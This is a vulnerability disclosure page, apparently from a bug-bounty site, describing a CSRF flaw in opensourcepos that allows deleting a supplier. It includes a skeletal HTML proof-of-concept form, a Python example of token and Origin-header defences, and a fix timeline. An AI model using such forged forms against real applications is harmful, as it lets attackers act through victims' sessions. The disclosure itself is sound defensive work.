Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos


Reported on

Oct 4th 2021


An attacker can delete a supplier through a CSRF attack: the application accepts the state-changing delete request when it is submitted from a form on an attacker-controlled page by the browser of a victim who is logged in to opensourcepos, with the victim's session.

Proof of Concept


  <script>history.pushState('', '', '/')</script>
  <!-- form action (target endpoint) is empty in the report as published -->
  <form action="">
    <input type="submit" value="Submit request" />
  </form>
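The PoC works because the victim's browser attaches the session cookie to the cross-site form post automatically, while the `history.pushState` line only rewrites the attacker page's visible URL to `/` and has no effect on the request itself. The check below is an added illustration of the standard defence, not opensourcepos code and not the change made in commit 329f17: a per-session synchronizer token that the attacker's page cannot read, backed by the `Origin` and `Sec-Fetch-Site` headers that browsers add to cross-site requests. The site origin, the `csrf_token` form field, the `supplier_id` field and all request contents are assumptions constructed for the example.

```python
"""Illustrative CSRF defence for a state-changing endpoint (not OSPOS code)."""
from __future__ import annotations

import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

SITE_ORIGIN = "https://pos.example.test"   # assumed origin of the POS deployment
SERVER_SECRET = secrets.token_bytes(32)    # per-deployment secret, generated at startup


@dataclass
class Request:
    """Minimal stand-in for an incoming HTTP request (constructed for the example)."""
    method: str
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)
    session_id: str = ""


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session: an HMAC over the session id, so a
    token obtained for one session (or forged without SERVER_SECRET) is rejected
    for every other session."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_check(req: Request) -> tuple[bool, str]:
    """Return (allowed, reason). Safe methods are not checked: they must not change state."""
    if req.method.upper() in ("GET", "HEAD", "OPTIONS"):
        return True, "safe method"

    # 1. Fetch metadata / Origin: set by the browser on a cross-site form post;
    #    the attacker's page can neither remove nor spoof them.
    sfs = req.headers.get("Sec-Fetch-Site")
    if sfs is not None and sfs not in ("same-origin", "same-site", "none"):
        return False, f"Sec-Fetch-Site={sfs}"
    origin = req.headers.get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return False, f"Origin={origin}"

    # 2. Synchronizer token: must be in the form body and match the session.
    #    This also covers old browsers that send no fetch metadata at all.
    submitted = req.form.get("csrf_token", "")
    expected = issue_csrf_token(req.session_id)
    if not hmac.compare_digest(submitted.encode(), expected.encode()):
        return False, "missing or invalid csrf_token"
    return True, "ok"


def demo() -> dict:
    """Run the check over three constructed requests and return the verdicts."""
    victim_session = "sess-victim-1"
    # Constructed request 1: what the PoC form produces once the victim submits it.
    # The session cookie rides along, but the page cannot read a token and the
    # browser marks the request as cross-site.
    forged = Request("POST",
                     headers={"Origin": "https://attacker.example",
                              "Sec-Fetch-Site": "cross-site"},
                     form={"supplier_id": "42"},
                     session_id=victim_session)
    # Constructed request 2: the legitimate delete from the application's own page.
    legit = Request("POST",
                    headers={"Origin": SITE_ORIGIN, "Sec-Fetch-Site": "same-origin"},
                    form={"supplier_id": "42",
                          "csrf_token": issue_csrf_token(victim_session)},
                    session_id=victim_session)
    # Constructed request 3: no fetch metadata, and a token the attacker obtained
    # for his own session; the HMAC binding to the victim's session rejects it.
    replayed = Request("POST",
                       headers={},
                       form={"supplier_id": "42",
                             "csrf_token": issue_csrf_token("sess-attacker-9")},
                       session_id=victim_session)
    return {"forged": csrf_check(forged),
            "legit": csrf_check(legit),
            "replayed": csrf_check(replayed)}


if __name__ == "__main__":
    for name, (ok, why) in demo().items():
        print(f"{name:9} allowed={ok!s:5} ({why})")
```

Either check alone stops the PoC above in a current browser; the token is what still holds when the headers are absent. Marking the session cookie `SameSite=Lax` or `Strict` adds a third, independent layer, since the browser then withholds the cookie from the cross-site POST entirely.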

Timeline

We have contacted a member of the opensourcepos team and are waiting to hear back (a year ago)
jekkos validated this vulnerability (a year ago)
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos marked this as fixed with commit 329f17 (a year ago)
jekkos has been awarded the fix bounty
This vulnerability will not receive a CVE